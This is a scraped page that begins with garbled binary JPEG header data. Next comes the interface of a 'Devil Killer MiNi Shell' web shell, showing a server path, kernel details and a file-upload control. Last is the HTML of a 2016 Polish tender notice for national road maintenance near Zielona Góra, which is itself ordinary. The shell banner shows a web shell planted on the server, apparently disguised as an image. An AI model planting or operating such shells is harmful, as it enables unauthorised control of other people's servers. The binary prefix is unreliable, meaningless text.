JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161115/343500-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='' target='_blank'></a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 343500 - 2016
              z dnia 2016-11-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zielona Góra: Roboty, dostawy i usługi w zakresie bieżącego utrzymania dróg krajowych oraz bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Oddział Zielona Góra z podziałem na 8 części.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Zielonej Górze, krajowy numer identyfikacyjny
              01751157500090, ul.
              Bohaterów Westerplatte 
              31,
              65-950 
              Zielona Góra, woj.
              lubuskie, państwo
              Polska, tel.
              683271068, e-mail
              , faks
              683253468.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa centralna
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />www.gddkia.gov.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Zielonej Górze, ul. Bohaterów Westerplatte 31, 65-950 Zielona Góra</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Roboty, dostawy i usługi w zakresie bieżącego utrzymania dróg krajowych oraz bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Oddział Zielona Góra z podziałem na 8 części.<br /><b>Numer referencyjny: </b>O.ZG.D-3.2412.10.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />8<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Roboty, dostawy i usługi w zakresie bieżącego utrzymania dróg krajowych oraz bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Oddział Zielona Góra z podziałem na  8 części: Część 1. Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Gorzowie Wlkp. obejmujące drogi 22, 22a 24, 24a S3f, S3a.
Część 2. Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Nowej Soli obejmujące drogi S3, 3, 3g, 27, 32, 32a.
Część 3. Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Słubicach obejmujące drogi 22, 22b, 31, 2, 29, 31, 92, 32.
Część 4. Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Żarach obejmujące drogi 12, 12a, 12e, 12f, 12n, 18, 27.
Część 5. Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Gorzowie Wlkp. obejmujące drogi 22, 22a, 24, 24a, S3a, S3f.
Część 6. Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Nowej Soli obejmujące drogi 27, 32, 32a.
Część 7. Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Słubicach obejmujące drogi 22, 22b, 31, 2, 29, 31, 92, 32.
Część 8. Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Żarach obejmujące drogi 12, 12a, 12e, 12f, 12n, 18, 27.
Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 roku Prawo budowlane (tj. Dz.U. z 2016r. poz. 290 ze zm.) ustawie z dnia 23 kwietnia 1964 r. Kodeks cywilny (tj. Dz. U. z 2016 r. poz. 380 ze zm.) i ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz. U. z 2015 r. poz. 2164 ze zm.).
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45233140-2,
                45233220-7,
                45233221-4,
                45232410-9,
                45233290-8,
                45233292-2,
                77211400-6,
                77211500-7,
                77310000-6,
                90610000-6,
                34992200-9,
                45200000-9,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Czas trwania umów - Część 1:Drogi 22, 22a, 24, 24a od 01.01.2017 r. do 30.04.2017 r. Droga S3a, S3f od 01.06.2017 r. do 30.09.2017 r. Część 2: Drogi 27, 32, 32a od 01.01.2017 r. do 30.04.2017 r., Drogi S3,3,3g od 01.01.2017 r. do 31.12.2018 r. Część 3: od 01.01.2017 r. do 30.04.2017 r. Część 4: od 01.01.2017 r. do 30.04.2017 r. Część 5: Drogi 22, 22a, 24, 24a od 01.01.2017 r. do 30.04.2017 r. Droga S3a, S3f od 01.06.2017 r. do 30.09.2017 r. Część 6: od 01.01.2017 r. do 30.04.2017 r. Część 7: od 01.04.2017 r. do 30.04.2017 r. Część 8: od 01.01.2017 r. do 30.04.2017 r. Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)Wykonawcy:
Minimalne warunki dotyczące doświadczenia Wykonawcy: 
Zamawiający uzna, iż Wykonawca zdolny do należytego wykonania udzielanego zamówienia, to taki, który wykaże się doświadczeniem, w należytym wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej:

DLA CZĘŚCI NR 1 - 4 
1 zadanie w przedmiocie robót i usług w zakresie bieżącego utrzymania dróg, w którego zakres wchodziły wszystkie poniższe roboty:
- remont cząstkowy nawierzchni,
- remont poboczy (ścięcie, uzupełnienie),
- montaż (wymiana) barier ochronnych stalowych,
o łącznej wartości umowy minimum 500.000,00 zł brutto, przy czym zadanie to obejmowało okres co najmniej 12 miesięczny. 

DLA CZĘŚCI NR 5 -8 
2 zadania w przedmiocie robót i usług w zakresie bieżącego utrzymania drogowych obiektów inżynierskich o wartości łącznej minimum 80.000,00 zł brutto, przy czym zadanie to obejmowało okres co najmniej 10 miesięczny. 

Należycie wykonane oznacza w szczególności: wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.

Jako zadanie wykonane - należy rozumieć wykonane roboty dla których wystawiono Świadectwo Przejęcia lub Protokół odbioru robót lub równoważny dokument w przypadku zamówień, w których nie wystawiano Świadectwa Przejęcia.
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień opublikowania ogłoszenia o zamówieniu dotyczącego niniejszego postępowania.

b) osób:
Minimalne warunki dotyczące doświadczenia i kwalifikacji osób skierowanych do realizacji zamówienia:
Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, iż na etapie realizacji zamówienia, będą dostępne osoby na każdą funkcję wymienioną poniżej, spełniające określone wymagania:
DLA CZĘŚCI NR 1-4
I. Osoba proponowana do pełnienia funkcji - Kierownik Robót:
wymagana liczba osób: 1 (jedna) 
Kwalifikacje i doświadczenie zawodowe:
1)posiadanie uprawnień (wymaganych ustawą z dnia 7 lipca 1994 roku Prawo budowlane lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów) do pełnienia samodzielnej funkcji technicznej w budownictwie w specjalności drogowej lub konstrukcyjno-inżynieryjnej obejmujących kierowanie robotami budowlanymi;
2)minimum dwukrotne sprawowanie funkcji kierownika budowy lub kierownika robót przy realizacji zadań o wartości każdego zadania minimum 200 000 zł brutto polegających na budowie lub przebudowie lub remoncie lub pracach w ramach bieżącego utrzymania dróg na drogach klasy minimum G

II. Osoba proponowana do pełnienia funkcji - Pracownik do kierowania ruchem:
wymagana liczba osób: 2 (dwie) 
Kwalifikacje i doświadczenie zawodowe:
ukończone szkolenie z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym w pasie drogowym (m. in. podawanie sygnałów i poleceń).

III. Pilarz motorowy
wymagana liczba osób: 6 (sześć) 
Kwalifikacje i doświadczenie zawodowe:
2 lata doświadczenia w pracach pilarza, posiadanie ukończonego kursu pilarza drzew 

Wykonawca składając oferty na więcej niż jedną część zobowiązany jest wykazać wymaganą ilość osób do wykonania każdej z części odrębnie. Zamawiający nie dopuszcza przedstawienia tej samej osoby w formularzach dotyczących różnych części. (W przypadku złożenia oferty na kilka części i wykazanie się dysponowaniem tej samej osoby w więcej niż 1 części, Zamawiający przy ocenie spełniania warunku uzna, że Wykonawca spełnia warunki udziału w postępowaniu w zakresie części o numerze niższym w kolejności).

DLA CZĘŚCI 5-8

IV. Osoba proponowana do pełnienia funkcji - Kierownik Robót:
wymagana liczba osób: 1 (jedna) bez względu na liczbę części na jaką Wykonawca składa ofertę (w każdej części może być wskazana ta sama osoba)

Kwalifikacje i doświadczenie zawodowe:
1)posiadanie uprawnień (wymaganych ustawą z dnia 7 lipca 1994 roku Prawo budowlane lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów) do pełnienia samodzielnej funkcji technicznej w budownictwie w specjalności mostowej obejmujących kierowanie robotami budowlanymi;
2)minimum trzykrotne sprawowanie funkcji kierownika budowy lub kierownika robót przy realizacji zadań o wartości każdego zadania minimum 80 000 zł brutto polegających na budowie lub przebudowie lub remoncie obiektu mostowego lub pracach remontowych w ramach bieżącego utrzymania drogowych obiektów inżynierskich.

V. Osoba proponowana do pełnienia funkcji - Pracownik do kierowania ruchem:
wymagana liczba osób: 2 (dwie) bez względu na liczbę części na jaką Wykonawca składa ofertę (w każdej części mogą być wskazane te same osoby)

Kwalifikacje i doświadczenie zawodowe:
ukończone szkolenie z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym w pasie drogowym (m. in. podawanie sygnałów i poleceń).

VI. Pracownicy niewykwalifikowani:
wymagana liczba osób: 2 (dwie) bez względu na liczbę części na jaką Wykonawca składa ofertę (w każdej części mogą być wskazane te same osoby).

Kwalifikacje i doświadczenie zawodowe:
1 rok doświadczenia w drogownictwie

Nie dopuszcza się łączenia stanowiska Kierownika Robót, pracownika do kierowania ruchem, pracowników niewykwalifikowanych.

Mając na uwadze obowiązujące w Polsce przepisy prawa krajowego  Ustawa Prawo Budowlane art. 12, pkt 7 oraz 12a, w przypadku osób spoza Polski możliwe jest uzyskanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie, nabytych w państwach członkowskich UE oraz wpisu do stosownej izby, po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w Ustawie z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008 r., Nr 63, poz. 394).

c) zdolności technicznej lub zawodowej:
DLA CZĘŚCI NR 1 -4 
Wykonawca musi mieć dostępne w celu realizacji zamówienia następujące narzędzia, wyposażenie zakładu i urządzenia techniczne, wymienione poniżej:

I. Sprzęt
1. Walec stalowy - minimalna liczba jednostek  na jedną część  1, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części  3, minimalna liczba jednostek  na cztery części  4; 
2. Walec ogumiony minimalna liczba jednostek  na jedną część  1, minimalna liczba jednostek  na dwie części 2, minimalna liczba jednostek na trzy części 2, minimalna liczba jednostek  na cztery części  2;
3. Rozkładarka mas bitumicznych -minimalna liczba jednostek  na jedną część 1 minimalna liczba jednostek na dwie części 2, minimalna liczba jednostek na trzy części  3, minimalna liczba jednostek na cztery części  3;
4. Frezarka do nawierzchni minimum szerokość 0,5 m -minimalna liczba jednostek na jedną część - 1, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części  2, minimalna liczba jednostek  na cztery części 2;
5. Skrapiarka - minimalna liczba jednostek  na jedną część  1, minimalna liczba jednostek  na dwie części -2, minimalna liczba jednostek  na trzy części -3, minimalna liczba jednostek  na cztery części 3;
6. Malowarka do pasów - minimalna liczba jednostek  na jedną część 1, minimalna liczba jednostek  na dwie części  2; minimalna liczba jednostek  na trzy części 2; minimalna liczba jednostek  na cztery części  2;
7. Recykler - minimalna liczba jednostek  na jedną część 1, minimalna liczba jednostek  na dwie części 2, minimalna liczba jednostek  na trzy części 2, minimalna liczba jednostek  na cztery części 2;
8. Szczotka mechaniczna - minimalna liczba jednostek na jedną część	1, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części  2, minimalna liczba jednostek na cztery części -2;
9. Zamiatarka samochodowa ze zraszaczem - minimalna liczba jednostek  na jedną część 1, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części  2, minimalna liczba jednostek na cztery części  2;
10. Ładowarka do 0,4 m3 -minimalna liczba jednostek na jedną część  1, minimalna liczba jednostek na dwie części  2, minimalna liczba jednostek  na trzy części  3,	minimalna liczba jednostek  na cztery części -4;
11. Przyczepka sygnalizacyjna - minimalna liczba jednostek na jedną część 2, minimalna liczba jednostek  na dwie części  4, minimalna liczba jednostek  na trzy części  6,	minimalna liczba jednostek na cztery części  8;
12. Myjka do znaków - minimalna liczba jednostek  na jedną część  1, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części  3, minimalna liczba jednostek na cztery części  4;
13. Kosiarka	- minimalna liczba jednostek  na jedną część 3, minimalna liczba jednostek  na dwie części  5, minimalna liczba jednostek na trzy części 7, minimalna liczba jednostek na cztery części  8;
14. Kosa spalinowa - minimalna liczba jednostek  na jedną część  4, minimalna liczba jednostek  na dwie części  6, minimalna liczba jednostek  na trzy części 8, minimalna liczba jednostek  na cztery części 10;
15. Młot wyburzeniowy - minimalna liczba jednostek  na jedną część  1, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części  2, minimalna liczba jednostek na cztery części  2;
16. Zagęszczarka wibracyjna - minimalna liczba jednostek na jedną część  1, minimalna liczba jednostek na dwie części  2, minimalna liczba jednostek  na trzy części  3, minimalna liczba jednostek  na cztery części  3,
17. Piła do asfaltu - minimalna liczba jednostek na jedną część - 2, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części 3, minimalna liczba jednostek na cztery części 4;
18. Piła do drzewa Minimalna liczba jednostek  na jedną część 2, minimalna liczba jednostek  na dwie części  4, minimalna liczba jednostek na trzy części 6, minimalna liczba jednostek na cztery części 6;
19. Rozdrabniacz do gałęzi - minimalna liczba jednostek  na jedną część 1, minimalna liczba jednostek na dwie części 2, minimalna liczba jednostek  na trzy części  2, minimalna liczba jednostek  na cztery części 2.

II. Środki transportu				
20. Samochód ciężarowy do 10 Mg - minimalna liczba jednostek na jedną część - 1, minimalna liczba jednostek  na dwie części  2, minimalna liczba jednostek  na trzy części  3, minimalna liczba jednostek na cztery części  4;
21. Koparko- ładowarka - minimalna liczba jednostek na jedną część  1, minimalna liczba jednostek na dwie części  2, minimalna liczba jednostek na trzy części  3, minimalna liczba jednostek na cztery części  3.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
